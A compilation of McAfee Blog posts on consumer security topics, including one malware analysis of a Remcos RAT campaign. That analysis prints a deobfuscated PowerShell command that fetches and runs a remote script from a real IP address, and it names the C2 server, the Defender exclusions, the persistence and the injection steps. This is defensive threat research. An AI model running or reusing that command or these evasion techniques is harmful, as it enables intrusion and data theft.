One of the most useful ways of safeguarding your privacy is to avoid saving your chat history. By default, ChatGPT stores all conversations between users and the chatbot with the aim of training OpenAI’s systems. If you do choose not to save your chat history, OpenAI will store your conversations for 30 days. Despite this, it is still one of the best steps you can take to protect yourself.
As mentioned above, ChatGPT can collect and process highly sensitive data and associate it with your email address and phone number. So, why not set up a dedicated email just for ChatGPT? And keep your shared personal details to a minimum. That way, the questions you ask or content you share can’t be associated with your identity. And always use a pseudonym to mask your true identity.
Whether it’s ChatGPT or Google’s Bard, it’s imperative that you stay up to date with the company’s privacy and data retention policies, so you understand how your data is managed. Find out how long your conversations will be stored for before they are anonymised or deleted and who your details could potentially be shared with.
So, if you’re looking for a recipe for dinner, ideas for an upcoming birthday party or help with a love letter, by all means get ChatGPT working for you. However, use a dedicated email address, don’t store your conversations and NEVER share sensitive information in the chat box. But if you need help with a confidential or sensitive issue, then maybe find another alternative. Why not phone a friend – on an encrypted app, of course!!
The post ChatGPT’s Impact on Privacy and How to Protect Yourself appeared first on McAfee Blog.
As of the writing of this article, the height of the pandemic seems like a distant but still vivid dream. Sanitizing packages, sparse grocery shelves, and video conferencing happy hours are things of the past for the majority of the population. Thank goodness.
A “new normal” society is adapting to today’s working culture. The work landscape changed significantly since 2020, and it might never return to what it once was. In 2022, workers spent an average 3.5 days in the office per week, which is 30% below the prepandemic in-office average.1
The work-from-home movement is likely here to stay, to the joy of employees seeking a better work-life balance and flexibility; however, some responsibility does fall upon people like you to secure home offices to protect sensitive company information.
To make sure you’re not the weak cyber link in your company’s security, make sure to follow these three tips for a secure home office.
When you’re not physically in front of your work computer, best practices dictate that you lock the screen or put your device to sleep. No matter how much you trust your family, roommates, or the trustworthy-looking person seated next to you at a café, your company device houses all kinds of corporate secrets. A stray glance from the wrong person could put that information’s secrecy in jeopardy. Plus, imagine your cat walking across your keyboard or a toddler mashing your mouse, deleting hours’ worth of work. Disastrous.
Then, when you’re done with work for the day, stow your device in a secure location, preferably a drawer with a lock. Even if your work computer is 10 times faster and sleeker than your personal laptop, keep each device in its designated sphere in your life: work devices only for work, personal devices only for personal activities.
Wi-Fi networks that are not password protected invite anyone off the street to surf on your network and eavesdrop on your online activities. A stranger sneaking on to your home Wi-Fi could be dangerous to your workplace. There would be very little stopping a stranger from spying on your connected work devices and spreading confidential information onto the dark web or leaking company secrets to the media.
There are a few steps you can take to secure your home office’s internet connection. First, make sure to change the default name and password of your router. Follow password best practices to create a strong first defense. For your router name, choose an obscure inside joke or a random pairing of nouns and adjectives. It’s best to omit your address and your real name as the name of your router, because that could alert a cybercriminal that that network belongs to you. Better yet, you can hide your router completely from strangers and only make it searchable to people who know the exact name of your network.
For an additional layer of protection, connect to a virtual private network (VPN). Your company may offer a corporate VPN. If not, signing up for your own VPN is easy. A VPN encrypts the traffic coming in and going out of your devices making it nearly impossible for a cybercriminal to burst into your online session and see what’s on your screen.
The scenarios outlined in your company’s security training may seem far-fetched, but the concepts of those boring corporate videos actually happen! For example, the huge Colonial Pipeline breach in 2021 originated from one employee who didn’t secure the company’s VPN with multifactor authentication (MFA).2 Cutting small corners like disabling MFA – which is such a basic and easy-to-use security measure – can have dire consequences.
Pay attention to your security training and make sure to follow all company cybersecurity rules and use security tools as your IT team intends. For example, if your company requires that everyone use a password manager, a corporate VPN, and multi-factor authentication, do so! And use them correctly every workday!
These tips are essential to a secure home office, but they’re also applicable to when you’re off the clock. Password- or passcode-protecting your personal laptop, smartphone, and tablet keeps prying eyes out of your devices, which actually hold more personally identifiable information (PII) than you may think. Password managers, a secure router, VPNs, and safe browsing habits will go a long way toward maintaining your online privacy.
To fill in the cracks to better protect your home devices and your PII, partner with McAfee+. McAfee+ includes a VPN, safe browsing tool, identity monitoring and remediation services, a password manager, and more for a more secure digital life.
In one global survey, 68% of people prefer hybrid work models, and nearly three-quarters of companies allow employees to work from home some of the time.3,4 The flexibility afforded by hybrid work and 100% work-from-home policies is amazing. Cutting out the time and cost of commuting five days a week is another bonus. Let’s make at-home work a lasting and secure way of professional life!
1McKinsey Global Institute, “How hybrid work has changed the way people work, live, and shop”
2The Hacker News, “Hackers Breached Colonial Pipeline Using Compromised VPN Password”
3World Economic Forum, “Hybrid working: Why there’s a widening gap between leaders and employees”
4International Foundation of Employee Benefit Plans, “Employee Benefits Survey: 2022 Results”
The post The Future of Work: How Technology & the WFH Landscape Are Making an Impact appeared first on McAfee Blog.
Your privacy means everything. And your identity too. The launch of McAfee Privacy & Identity Guard will protect them both.
We’re proud to announce the launch of McAfee Privacy & Identity Guard in partnership with Staples. Through this partnership, McAfee’s Privacy & Identity Guard will be available at select Staples locations across the U.S. and help customers protect their identity and privacy online.
McAfee’s Privacy & Identity Guard will be sold in the travel section of Staples along with other travel benefits such as passport services, TSA PreCheck sign up, and fingerprinting services. McAfee’s Privacy & Identity Guard offers a natural fit for Staples customers who are on the go, particularly as they rely on their laptops and smartphones to get things done while traveling.
And people certainly have concerns about their privacy and identity when they hit the road. McAfee’s recent Safer Summer Report revealed 1 in 3 people have been scammed when booking or taking trips, with a third (34%) of those losing $1,000 or more. This same study found 61% of all adults worry more about digital safety than physical safety when on vacation.
“As Staples exclusive tech services security partner for the last seven years, we’re excited to partner with Staples on the initial launch of McAfee Privacy & Identity Guard in the U.S.,” said Gagan Singh, McAfee’s Executive Vice President, Chief Operating Officer. “This online protection product was designed to address consumers’ key concerns about safeguarding personal information online, something that becomes even more at risk when traveling.”
Identity Monitoring – Monitor personal information with timely alerts.
Identity Restoration – Exclusive to Staples customers, these features offer further peace of mind in the event of identity theft or loss.
Privacy Features – Find personal data tied to old, unused online accounts & requests removal of any personal information found on data broker sites.
Is your email on the dark web?
One sign that your privacy and identity is at risk if your email appears on the dark web. Hackers and scammers post email addresses and other personal and financial information on dark web sites—sometimes offered freely, sometimes offered to other hackers and scammers for sale. You can find out if your email is posted on the dark web by visiting https://www.mcafee.com/idscan-staples.
The post McAfee’s New Privacy & Identity Guard Launches at Staples Stores appeared first on McAfee Blog.
The humble USB drive—the workhorse of students, professionals, and everyday computer users. No wonder hackers put USB drives in their crosshairs.
Why such a target? All the things that make USB drives attractive to us make them attractive to hackers. They’re inexpensive, portable, and often swap between users. Taken together, that creates the perfect medium for hosting and distributing malware.
Likewise, USB drives can get lost or stolen quite easily. An absentminded or careless moment could put sensitive information at risk.
However, that’s not to say you should avoid using USB drives. Not at all. In fact, you can use them securely by taking a few straightforward steps.
Encryption gives you huge peace of mind in the event you lose your USB drive. It prevents others from accessing the data and files on it by scrambling them. Only a person with the password can access them. Windows users can check out this “how to” article on encryption—Apple users can learn about encryption on their support site as well.
If you’d rather skip those steps, you can purchase a USB drive that uses hardware-based encryption built in. These drives cost a little more, yet they more than make up for that in the protection that they offer.
Physical security is important too. You can prevent loss and theft by toting around your drive in your pocket, bag, or purse. Locking it away in a secure location while you’re not using it stands as a solid option as well.
You never know what malware might be lurking on someone else’s device. Sharing a USB drive with someone else can help malware make the jump from their device to yours. Think twice before sharing.
Don’t put it past hackers to load a USB drive with malware in the hopes that someone will pick it up. In fact, several large malware campaigns got their start by mailing “free” USB drives to thousands and thousands of households, businesses, and government agencies.
On Windows computers, you can prevent USB drives from automatically running any files. Some malware will run when the drive gets inserted into the device. Head to Settings > Devices > AutoPlay to disable that feature.
Deleting a file doesn’t erase data from a drive. It makes space available on a drive, so that old data might still be there—and recoverable. Comprehensive online protection like ours includes a file shredder that will completely erase old data and files.
Malware can easily make its way onto a USB drive. Comprehensive online protection can spot, block, and remove malware before it can do any harm.
The post USB Drives – Protecting Your Humble Workhorse from Malware and Loss appeared first on McAfee Blog.
It’s a longstanding question: can your phone really take selfies without your knowledge?
The answer is yes, but with a pretty big asterisk next to it. And that asterisk is known as spyware. Spyware can use your phone for snooping in several ways, including using your camera to take pictures and videos.
What exactly is spyware? It’s any software or app that steals information from a device and passes it to another party without the victim’s knowledge. And here’s the tricky part—you might have installed it yourself, right from an app store. In other words, you can end up with spyware without a hacker installing it on your phone via a malicious download or link.
Fortunately, you can avoid spyware rather easily.
First off, it helps to know how spyware can take over your phone’s camera.
It comes down to permissions. Apps require permissions to do things like access your contacts, photo library, microphone, and camera. For example, a social media app will ask for permission to access your camera if you want to snap a pic and post it online. A messaging app might ask for access to your camera and microphone to send video and voice messages. Likewise, a navigation or rideshare app will ask for permission to access your phone’s location services. Depending on your specific settings, your app might ask for permissions each time you use it, or you might give an app blanket permissions the first time you use it.
Effectively, permissions make apps go. Yet some apps cross the line. They ask for invasive permissions that they absolutely don’t need to function. A classic example is the glut of old flashlight apps that asked for permission to access things like contact lists and cameras. With those permissions, bad actors stole all manner of personal information. In some cases, they used the phone’s camera and microphone to spy on their victims.
That old “flashlight app” ruse continues today. You’ll occasionally see reports of spyware cropping up in app stores. This spyware hides in plain sight by masquerading as legitimate apps—like document readers, chat apps, wallpaper apps, and even security software. But these apps are all bogus.
Google Play does its part to keep its virtual shelves free of malware-laden apps with a thorough submission process as reported by Google and through its App Defense Alliance that shares intelligence across a network of partners, of which we’re a proud member. Further, users also have the option of running Play Protect to check apps for safety before they’re downloaded.
Apple’s App Store has its own rigorous submission process for submitting apps. Likewise, Apple deletes hundreds of thousands of malicious apps from its store each year.
Yet, bad actors find ways to sneak malware into the store. Sometimes they upload an app that’s initially clean and then push the malware to users as part of an update. Other times, they’ll embed the malicious code so that it only triggers after it’s run in certain countries. They will also encrypt malicious code in the app that they submit, which can make it difficult for reviewers to sniff out.
Unique to Android phones, Android gives people the option to download apps from third-party app stores. These stores might or might not have a thorough app submission process in place. As a result, they can be far less secure than Google Play. Moreover, some third-party app stores are fronts for organized cybercrime gangs, built specifically to distribute malware, making third-party downloads that much riskier.
The post Secret Selfies: Can Phones Take Pictures and Videos of You Without Your Knowledge? appeared first on McAfee Blog.
We reported earlier this year, a fresh rash of online job scams continue to rope in plenty of victims. Now, those victims are taking to TikTok with a warning.
https://www.tiktok.com.mcas.ms/@thenamesamber/video/7188616142062275886
Source, thenamesamber on TikTok
Take the story thenamesamber told on TikTok. It starts out like many. Amber wanted a job that allowed remote work, and luckily enough, a recruiter reached out to her through an online recruiting site with an opportunity.
From there, the recruiter directed Amber to download a messaging app, which the company would use for the interview process. The interview went just fine, Amber got a job offer, and then the company asked Amber for a home address.
Here’s where the catch comes in.
Amber goes on to say that the company sent her a check by overnight mail, a check she should use to buy equipment. A check for nearly $5,000. For days, the check didn’t post. The company repeatedly asked for update. Had it posted yet? Had it posted yet?
At this point, Amber said she got suspicious. She contacted her bank. The check had a hold placed on it, and according to Amber, she was charged a fee and her account frozen for days. In speaking with her bank, Amber was told that the check was bad and that she was the victim of a scam. The bank has seen a lot of it lately, said Amber.
Yet based on what we’ve seen, Amber got lucky.
Victims and banks sometimes fail to spot the scam as it unfolds. In those cases, the check gets posted and the scammers tell the victim to forward the money to another person who’ll purchase equipment for them. Usually by way of an online payment app.
Days later, the check bounces for insufficient funds. Meanwhile, victims get burdened with the fraud reporting process — with their bank and with the payment app they used. Depending on the means and terms of payment, some or all of that money might be gone for good. And as a result, the scammers get a few thousand dollars richer.
If you spend some time on social media, you’ll stumble across plenty of videos that tell this exact story in one form or another. And with each story, you’ll find dozens of people sharing that the same thing happened, or almost happened, to them.
We’re glad people are taking to TikTok to share their stories, even as sharing those stories can get painful. You can avoid these scams. Part of it involves awareness. They’re still going strong. The next part counts on you and your sharp eye to spot sketchy behavior when you see it.
We’ll show you how, and that begins with a look at where these scams take place.
Employment figures continue to surge. It’s a hot job market out there, and when things get hot, you’ll find scammers looking to turn a buck. It’s much like tax season and gift-giving holidays. Scammers will take advantage of trends and seasonal events where people go online and there’s money involved. Job scams are no different.
Where do these scams crop up?
As we reported earlier this year and as TikTok videos have shared, many appear to originate from trusted online recruiting platforms like LinkedIn and Indeed. Scammers will either set up a bogus company or pose as a representative of a legitimate company. In other cases, job scams take root on social media. Here, scammers play the same game—set up a bogus company or impersonate a legitimate one.
From there, stories like Amber’s unfold.
Without question, recruiting and social media platforms know what’s going on and take steps to quash scam accounts.
For example, LinkedIn’s latest community report cited the removal of more than 21 million fake accounts in the first half of 2022:
Likewise, Facebook took action on 426 million fake accounts in Q1 of 2023 alone, with nearly 99% of them acted on before users reported them.
In its guidelines for a safe job search, Indeed mentions the global teams “dedicated to the safety and authenticity of the jobs posted on our platform.”
Still, some scammers make their way through to these platforms and others like them.
Our earlier advice on the topic still holds true. You can spot scams several ways, particularly when you know that scammers want your money and personal information as quickly as possible. The moment any so-called job offer asks for any of those, a red flag should immediately go up.
It’s possibly a scam if:
They ask for your Social Security or tax ID number.
In the hands of a scammer, your SSN or tax ID is the key to your identity. With it, they can open up bank cards, lines of credit, apply for insurance benefits, collect benefits and tax returns, or even commit crimes, all in your name. Needless to say, scammers will ask for it, perhaps under the guise of a background check or for payroll purposes. The only time you should provide your SSN or tax ID is when you know that you have accepted a legitimate job with a legitimate company. Only sent it through a secure document signing service, never via email, text, or over the phone.
They want your banking information.
Another trick scammers rely on is asking for bank account information so that they can wire a payment to you. As with the SSN above, closely guard this information and treat it in exactly the same way. Don’t give it out unless you have a legitimate job with a legitimate company.
They want you to pay before you get paid.
Some scammers will take a different route. They’ll promise employment, but first you’ll need to pay them for training, onboarding, or equipment before you can start work. Legitimate companies won’t make these kinds of requests. Amber’s check story provides a good example of this.
They tell you to download a specific messaging app to communicate with them.
Victims report that the scammers require a specific app to chat and, sometimes, to conduct the interview itself. Apps like Signal and Wire get mentioned, yet rest assured that these apps themselves are legitimate. The scammers are the problem, not the apps. Consider it a warning sign if someone asks you to largely communicate this way.
Aside from the types of information they ask for, the way they ask for your information offers other clues that you might find yourself mixed up in a scam. Look out for the following as well:
1) The offer is big on promises but short on details.
You can sniff out many online scams with the “too good to be true” test. Scammers often make big promises during the holidays with low-priced offers for hard-to-get holiday gifts and then don’t deliver. It’s the same with job scams. The high pay, the low hours, and even the offer of things like a laptop and other perks, these are signs that a job offer might be a scam. Moreover, when pressed for details about this seemingly fantastic job opportunity, scammers might balk. Or they might come back with incomplete or inconsistent replies because the job doesn’t exist at all.
2) They communicate only through email or chat.
Job scammers hide behind their screens. They use the anonymity of the internet to their advantage. Job scammers likewise create phony profiles on networking and social media websites, which means they won’t agree to a video chat or call, which are commonly used in legitimate recruiting today. If your job offer doesn’t involve some sort of face-to-face communication, that indicates it might be a scam.
3) And the communications seem a little …off.
Scammers now have an additional tool to reel in their victims — AI chatbots like Chat GPT, which can generate email correspondence, chats, LinkedIn profiles, and other content in seconds so they can bilk victims on a huge scale. However, AI has its limits. Right now, it tends to use shorter sentences in a way that seems like it’s spitting out information. There’s little story or substance to the content it creates. That might be a sign of a scam. Likewise, even without AI, you might spot a recruiter using technical or job-related terms in unusual ways, as if they’re unfamiliar with the work they’re hiring for. That’s another potential sign.
4) Things move too quickly.
Scammers love quick conversion. Yet job seekers today know that interview processes are typically long and involved, often relying on several rounds of interviews and loops. If a job offer comes along without the usual rigor and the recruiter is asking for personal information practically right away, that’s another near-certain sign of a scam.
5) You get job offers on Facebook or other social media sites not associated with job searches.
This is another red flag. Legitimate businesses stick to platforms associated with networking for business purposes, typically not networking for families, friends, and interests. Why do scammers use sites like Facebook anyway? They’re a gold mine of information. By trolling public profiles, they have access to years of posts and armloads of personal information on thousands of people, which they can use to target their attacks. This is another good reason to set your social media profiles on platforms like Facebook, Instagram, and other friend-oriented sites to private so that scammers of all kinds, not just job scammers, can’t use your information against you.
As a job hunter you know that getting the right job requires some research. You look up the company, dig into their history—the work they do, how long they’ve been at it, where their locations are, and maybe even read some reviews provided by current or former employees. When it comes to job offers that come out of the blue, it calls for taking that research a step further.
After all, is that business really a business, or is it really a scam?
In the U.S., you have several resources that can help you answer that question. The Better Business Bureau (BBB) offers a searchable listing of businesses in the U.S., along with a brief profile, a rating, and even a list of complaints (and company responses) waged against them. Spending some time here can quickly shed light on the legitimacy of a company.
Also in the U.S., you can visit the website of your state’s Secretary of State and search for the business in question, where you can find when it was founded, if it’s still active, or if it exists at all. For businesses based in a state other than your own, you can visit that state’s Secretary of State website for information. For a state-by-state list of Secretaries of State, you can visit the Secretary of State Corporate Search page here.
For a listing of businesses with international locations, organizations like S&P Global Ratings and the Dun and Bradstreet Corporation can provide background information, which might require signing up for an account.
Given the way we rely so heavily on the internet to get things done and enjoy our day, comprehensive online protection software that looks out for your identity, privacy, and devices is a must. Specific to job scams, it can help you in several ways, these being just a few:
Amber’s story, and stories like hers have racked up nearly a quarter-billion dollars in reported losses in the first half of this year here in the U.S. The median loss, somewhere around $2,000 per victim.
Job scams persist. In fact, they’ve increased by nearly 25% this year compared to this time last year. It’s no surprise that scam stories on TikTok keep racking up. Yet as you’ve seen, awareness and a sharp eye can help you avoid them.
Editor’s Note:
Job scams are a crime. If you think that you or someone you know has fallen victim to one, report it to your authorities and appropriate government agencies. In the case of identity theft or loss of personal information, our knowledge base article on identity theft offers suggestions for the specific steps you can take in specific countries, along with helpful links for local authorities that you can turn to for reporting and assistance.
The post Online Job Scams – TikTokers Tell Their Stories, with a Warning appeared first on McAfee Blog.
Authored by Preksha Saxena
McAfee labs observed a Remcos RAT campaign where malicious VBS files were delivered via phishing email. A phishing email contained a ZIP/RAR attachment. Inside this ZIP, was a heavily obfuscated VBS file.
Remcos is a sophisticated RAT which provides an attacker with backdoor access to the infected system and collects a variety of sensitive information. Remcos incorporates different obfuscation and anti-debugging techniques to evade detection. It regularly updates its features and makes this malware a challenging adversary.
Figure 1: Execution Flow
VBS file is downloaded from a RAR file which is named as “August 2023 Statement of Account.z” This VBS file used various techniques to make analysis very difficult; including lots of commented code, and random strings that mask the true execution chain from being quickly visible. The actual data for execution is obfuscated too.
Investigating this VBS script started with dealing with the large comment blocks as shown in figure below.
Figure 2:VBS Script
One obfuscated string references a URL. The script contains a replace function to deobfuscate the proper command line.
Another part of VBS script is the execute function shown in below image, which merely decodes a fake message.
“omg!it’s_so_long_:-)you_found_the_secret_message_congrats!!”
Figure 3:Deobfuscating PowerShell command using replace function.
The purpose of this VBS script is to download a payload using PowerShell. To increase the size, and make the script obfuscated, comments were added. The PowerShell command deobfuscates to:
“powershell -w 1 -exeC Bypass -c “”[scriptblock]::Create ((Invoke-WebRequest ‘http://212.192.219.52/87656.txt’ -UseBasicParsing).Content).Invoke();”””
The downloaded file, 87656.txt, is an obfuscated PowerShell script.
Figure 4:Obfuscated PowerShell Script
The deobfuscation logic first searches for any variable containing “mdR”; in this case the result is ‘MaximumDriveCount’. From this string, characters at positions [3,11,2] are selected, resulting in the string “iex”. Here malware obfuscates iex(Invoke-Expression) command to evade itself from static detection.
Figure 5:Resolving IEX
Then, PowerShell script decodes the data using the Base64String algorithm and decompresses the decoded data using the Deflate Stream algorithm.
Decompressed data is again a PowerShell script which is analyzed below.
The decompressed PowerShell script is large and obfuscated:
Figure 6: Decompressed PowerShell script
The first part of the script has the same logic present in the first PowerShell file. It is again decoding invoke-expression “ieX” by using the psHome variable.
Figure 7:Deobfuscating PowerShell script
The second part of the PowerShell script contains a base64 encoded PE file, which will be analyzed in a later stage.
Figure 8: Base64 encoded data.
The third part of PowerShell script is used to inject the decoded PE file in a newly created process. After deobfuscation, the code below is used for code injection. “Wintask.exe” is launched as a new process by the PowerShell script and the aforementioned PE file is injected in the Wintask.exe process.
Figure 9: Code used for PE injection.
Windows Defender exclusions are added.
Figure 10: Exclusion code
The 1.1MB PE file is a .NET binary, using an MSIL loader.
Figure 11: MSIL Loader
The Main function calls the Units function, which calls a random function.
Figure 12:Main function
The random function contains a large amount of encrypted data, stored in a text variable.
Figure 13: Encrypted data
The ‘text’ data is first converted from string to hex array then reversed and stored in variable ‘array’. The decryption key is hardcoded and stored in variable ‘array4’. The key is “0xD7” (215 in decimal).
Figure 14: code for converting data to uppercase.
The decryption loop issues the RC4 algorithm. The data decrypts a PE file, which is a DLL (Dynamic Link Library), loaded and executed using the ‘NewLateBinding.LateGet()’ method, passing the payload file (dGXsvRf.dll) as an argument as shown below.
To execute the decrypted DLL in memory, the malware uses reflecting code loading. In this process, malware injects and executes the decrypted code in the same process. For this, the malware uses the load parameter in the ‘NewLateBinding.LateGet()’ function.
Figure 15: RC4 algorithm
Figure 16: New instance created for decrypted dll
Decrypted DLL ‘dGXsvRf.dll’ is the SykCrypter Trojan, using a resource named “SYKSBIKO” containing an encrypted payload.
Figure 17: Encrypted payload
SykCrypter decrypts the final payload and decrypts many strings related to identifying the presence of AV software, persistence, and anti-debugging techniques. The SykCrypter encrypted data is very large and is decrypted using a simple XOR operation with 170 as the key and current index.
Figure 18: SykCryptor Encrypted data
Each string is decrypted and accessed using a predefined function which hardcodes its length and offset in a large byte array. The final payload is stored in a resource and is decrypted using the RC4 algorithm with the key “uQExKBCIDisposablev”.
Figure 19: RC4 Algorithm
Another .NET dll with size 0x1200 and the method name, “Zlas1” is used for deflation.
Figure 20: Loading DLL for deflation.
The DLL then decrypts a list of various security solution process names:
Figure 21:Code for decrypting Security processes Names
The decrypted list of process names include:
vsserv bdservicehost odscanui bdagent
bullgaurd BgScan BullGuardBhvScanner etc.
The malware also drops acopy of itself in the %appdata% folder using cmd.
Figure 22: Copying file.
To persist system reboots, the malware creates a shortcut file in the Documents folder with a.pif extension, and creates a registry Run key entry.
Figure 23: Persistence Mechanism
The SykCrypter Dll decrypts and loads a .NET file and calls its “GetDelegateForFunctionPointer” function, creating delegation to all APIs from kernel32 and NTDll.dll in the same method. It loads GetThreadContext, SetThreadContext, ReadProcessMemory, VirtualAllocEx, NtUnmapViewOfSection and so on.
Then, finally it loads “WriteProcessMemory,” API which injects the decrypted payload into a process and calls ResumeThread.
Figure 24: Process Injection
The final payload is a Microsoft Visual C++ 8 executable with size of 477 KB. Strings directly visible in file are:
Figure 25: Strings in payload
The configuration file of Remcos is present in RCData “SETTINGS“, which is encrypted with the RC4 algorithm. In the given sample, the key size is 76 byte long.
Figure 26: RC4 encrypted configuration file
Decrypted Configuration:
Figure 27: Decrypted configuration
The Remcos configuration has C2 information (172.96.14.18), its port number (2404), mutex created by malware (Rmc-OB0RTV) and other configuration details. It has the capability to harvest information from various applications, such as browsers, email clients, cryptocurrency wallets etc. It also enables remote access for an attacker and can act as a dropper for other malware.
RemcosRat is a complex multi-stage threat. McAfee Labs unpacked the how this malware downloads and executes VBS and PowerShell scripts; how the threat unwraps different layers and downloads the final Remcos remote access payload. At McAfee, we are committed to providing our customers with robust and effective threat defense that detects and protects against threats like RemcosRat and many other families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats to keep you safe.
SHA256 | Filetype |
0b3d65305edc50d3882973e47e9fbf4abc1f04eaecb13021f434eba8adf80b67 | VBS |
3ed5729dc3f12a479885e434e0bdb7722f8dd0c0b8b27287111564303b98036c | PowerShell |
1035dbc121b350176c06f72311379b230aaf791b01c7091b45e4c902e9aba3f4 | MSIL loader |
32c8993532bc4e1f16e86c70c0fac5d51439556b8dcc6df647a2288bc70b8abf | SykCrypter |
61c72e0dd15ea3de383e908fdb25c6064a5fa84842d4dbf7dc49b9a01be30517 | Remcos Payload |
The post Peeling Back the Layers of RemcosRat Malware appeared first on McAfee Blog.
You can almost feel it in the air. Wi-Fi is everywhere. And if you tap into public Wi-Fi, do it with a VPN.
The keyword in public Wi-Fi is “public.” That means anyone else on the network can see what you’re connecting to and what data you’re passing along, with a little effort. Your credit card number while you shop. Your password when you bank. That confidential contract you just sent to a client. And your logins for social media too. It’s all an open book to anyone who has the tools to snoop.
What tools let them snoop? Network analyzers, or packet sniffers as many call them, can read the data traffic that travels across a network. And because public Wi-Fi networks are open, so is the data traffic — loaded with your credentials, personal info, and so on. A bad actor can gather up data with a packet sniffer, analyze it, and pluck out the sensitive bits of information that are of value.
This is where a VPN comes in. It makes any network private. Even on public Wi-Fi.
Let’s take a look at what a VPN is, how it works, and why it’s your friend on public Wi-Fi.
A VPN is an app that you install on your device to help keep your data safe as you browse the internet. When you turn on your VPN app, your device makes a secure connection to a VPN server that routes internet traffic. Securely. This keeps your online activity private on any network, shielding it from prying eyes. Thus, while you’re on a VPN, you can browse and bank with the confidence that your passwords, credentials, and financial information are secure. If any malicious actors attempt to intercept your web traffic, they’ll only see garbled content, thanks to your VPN’s encryption functionality.
Every internet connection is assigned a unique set of numbers called an IP address, which is tied to information such as geographic location or an Internet Service Provider (ISP). A VPN replaces your actual IP address to make it look like you’ve connected to the internet from the physical location of the VPN server, rather than your real location. This is just one reason so many people use VPNs.
To change your IP address, you open your VPN app, select the server location you’d like to connect to, and you’re done. You’re now browsing with a new IP address.
An ideal case for using a VPN is when you’re using public Wi-Fi at the airport, a café, hotel, or just about any place “free Wi-Fi” is offered. The reason being is that these are open networks, and any somewhat enterprising cybercriminal can tap into these networks and harvest sensitive information as a result. One survey showed that 39% of internet users worldwide understand public Wi-Fi is unsafe, yet some users still bank, shop, and do other sensitive things on public Wi-Fi despite the understood risks.
Further, you have your privacy to consider. You can use a VPN to help stop advertisers from tracking you. Searches you perform and websites you visit won’t get traced back to you, which can prevent advertisers from gleaning information about you and your online habits in general. Moreover, some ISPs collect the browsing history of their users and share it with advertisers and other third parties. A VPN can prevent this type of collection as well.
A VPN protects your search history through the secure connection you share. When you search for a website, or type a URL into your navigation bar, your device sends something called a DNS request, which translates the website into the IP address of the web server. This is how your browser can find the website and serve its content to you. By encrypting your DNS requests, a VPN can hide your search habits and history from those that might use that info as part of building a profile of you. Others might use this info in a wide variety of ways, from legitimately serving targeted ads to nefarious social engineering.
Note that a VPN is quite different and far, far more comprehensive than using “Private Mode” or “Incognito Mode” on your browser. Those modes only hide your search history locally on your device—not from others on the internet, like ISPs and advertisers.
No, a VPN can’t make you anonymous. Not entirely anyway. They help secure what you’re doing, but your ISP still knows when you’re using the internet. They just can’t see what you’re doing, what sites you visit, or how long you’ve been on a site.
Apple’s Private Relay is similar to a VPN in that it changes your IP address so websites you visit can’t tell exactly where you are. It works on iOS and Macs as part of an iCloud+ subscription. Yet there is one important distinction: it only protects your privacy while surfing with the Safari browser.
Per Apple, it works like this:
When Private Relay is enabled, your requests are sent through two separate, secure internet relays. Your IP address is visible to your network provider and to the first relay, which is operated by Apple. Your DNS records are encrypted, so neither party can see the address of the website you’re trying to visit. The second relay, which is operated by a third-party content provider, generates a temporary IP address, decrypts the name of the website you requested, and connects you to the site. All of this is done using the latest internet standards to maintain a high-performance browsing experience while protecting your privacy.
Check to see if Apple Private Relay is available in your country or region. If you travel somewhere that Private Relay isn’t available, it’ll automatically turn off and will notify you when it’s unavailable and once more when it’s active again. You can learn more about it here , and how you can enable it on your Apple devices.
Private Relay only works with Safari on iOS and macOS as part of an iCloud+ subscription. Even if you are using an Apple device, a VPN is still a good idea because it’ll protect the information that your device sends outside of Safari — such as any info passed along by your apps or any other browsers you might use.
An unlimited VPN with bank-grade encryption comes as part of your McAfee+ subscription and provides the security and privacy benefits above with bank-grade encryption. Additionally, it turns on automatically any time you connect to an unsecured Wi-Fi network, which takes the guesswork out of when you absolutely need to use it.
In all, our VPN makes it practically impossible for cybercriminals or advertisers to access so that what you do online remains anonymous, so you can enjoy your time online with confidence.
The post On Public Wi-Fi, a VPN is Your Friend appeared first on McAfee Blog.
Have you ever lost your suitcase on vacation? You arrive at baggage claim, keeping your eyes peeled for your belongings. The carousel goes around and around dozens of times, but there’s no mistaking it: Your bag is gone. It could be anywhere!
Now, you have to shop for new outfits and restock your toiletries. A logistical headache for sure.
But have you ever lost your smartphone or your personally identifiable information (PII) on vacation? The stress and ramifications of either scenario puts the minor inconvenience of buying toothpaste into perspective. Not only is it an expensive piece of technology to replace, but the real cost comes from sensitive personal information stored on your phone that could land in a stranger’s hands.
To travel-proof your PII and mobile devices, here are some key steps you should take before, during, and after your big international trip.
The surefire way to ensure your device isn’t stolen or lost while traveling internationally is to leave it at home. If that’s a viable option, do it! When traveling outside your home country, your phone plan might not even work abroad. Before you depart, think about how you might use your smartphone on vacation. To stay in contact with your traveling partners, consider outfitting your party with prepaid phones. These basic phones are usually inexpensive, and you can buy them at most airports and convenience stores when you arrive at your destination.
If you do decide to bring your phone, here are a few quick device security measures you can put into place to protect your device and the sensitive information you have on it.
Also before you depart, do some research on the local dress, polite customs, and a few useful phrases in the local language. It’s best to try to blend in as much as possible while traveling. Revise your packing list to carry as little as possible. Wrangling a pile of luggage could distract you from paying attention to your surroundings.
Seeing world-famous landmarks with your own eyes is one of the best parts of traveling, though tourist hot spots are infamous for various pickpocketing schemes. Even when you’re dazzled by the sights, remain aware of your surroundings.
Another way to protect the information on your device is to be careful when logging into public wi-fi networks and scanning QR codes while you’re traveling. Cybercriminals can lurk on the free networks provided by hotels, cafes, airports, public libraries, etc. They wait for someone to log on and make a purchase or check their bank balance and swoop in to digitally eavesdrop on their sessions.
Luckily, there’s an easy way to surf public wi-fi networks safely: virtual private networks (VPN). When you enable a VPN on your device, it encrypts all the information running into and out of your device, making it nearly impossible for someone to track your online comings and goings. McAfee+ includes a VPN among its many other services.
QR codes are a convenient way for museums, restaurants, and other establishments to direct customers to a website for more information instead of dealing with paper pamphlets and menus. When you scan a QR code, double check that it’s official and ok to scan. Cybercriminals may post legitimate-looking QR codes that direct to suspicious sites or download malware to your device.
Once you’re home from your adventure, it’s best practice to do some digital housekeeping. For example, delete your vacation-specific apps, like the train services you used to check schedules or book tickets. The fewer apps you have, the fewer chances a cybercriminal has of stealing your personal or payment information.
Then, for the next few weeks, keep an eye on your credit card statements and any suspicious activity regarding your credit or identity. While you’re monitoring your accounts, might as well change your passwords while you’re in there. McAfee+ offers identity monitoring, credit reports, and identity theft coverage to give you extra peace of mind.
Don’t let the unease of pickpockets or hidden malware stop you from enjoying your trip! Really, it only takes a few moderations to your daily routine to help you keep your devices and identity safer.
